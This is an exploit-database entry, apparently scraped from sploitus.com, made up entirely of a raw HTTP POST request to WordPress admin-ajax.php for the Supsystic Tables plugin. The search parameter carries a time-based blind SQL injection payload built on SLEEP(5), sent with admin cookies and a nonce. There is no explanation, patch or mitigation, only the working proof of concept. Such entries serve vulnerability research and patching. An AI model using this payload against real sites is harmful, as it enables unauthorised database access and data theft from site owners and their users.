Share
## https://sploitus.com/exploit?id=WPEX-ID:117BB262-133D-4117-B279-B5483EFB6810
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/admin.php?page=supsystic-tables&module=tables&nonce=6cda51eefd
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 336
Origin: https://example.com
Connection: close
Cookie: [admin cookies]
route%5Bmodule%5D=tables&route%5Baction%5D=getListForTbl&route%5Bnonce%5D=6cda51eefd&data%5Bsearch%5D%5Btext_like%5D=aa'%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)%20AND%20'42'='42&data%5B_search%5D=false&data%5Bnd%5D=1612792425884&data%5Brows%5D=10&data%5Bpage%5D=0&data%5Bsidx%5D=id&data%5Bsord%5D=desc&action=supsystic-tables